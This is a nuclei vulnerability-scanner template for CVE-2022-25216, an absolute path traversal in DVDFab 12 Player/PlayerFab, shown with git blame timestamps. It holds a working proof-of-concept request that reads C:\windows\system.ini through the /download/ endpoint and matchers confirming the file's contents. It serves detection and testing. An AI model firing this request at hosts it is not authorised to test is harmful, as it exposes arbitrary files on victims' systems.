nuclei-templates/cves/2022/CVE-2022-25216.yaml

36 lines
996 B
YAML
Raw Normal View History

2022-04-13 00:33:44 +00:00
id: CVE-2022-25216
info:
2022-04-14 09:22:19 +00:00
name: DVDFab 12 Player/PlayerFab - Arbitrary File Read
2022-04-13 00:33:44 +00:00
author: 0x_Akoko
severity: high
description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
reference:
- https://www.tenable.com/security/research/tra-2022-07
- https://www.cvedetails.com/cve/CVE-2022-25216
2022-04-13 00:33:44 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-25216
cwe-id: CWE-22
2022-04-14 09:00:24 +00:00
tags: cve,cve2022,dvdFab,lfi,lfr
2022-04-13 00:33:44 +00:00
requests:
- method: GET
path:
2022-04-14 09:00:24 +00:00
- "{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"
2022-04-13 00:33:44 +00:00
2022-04-14 09:00:24 +00:00
matchers-condition: and
2022-04-13 00:33:44 +00:00
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2022-04-13 00:33:44 +00:00
2022-04-14 09:00:24 +00:00
- type: status
status:
- 200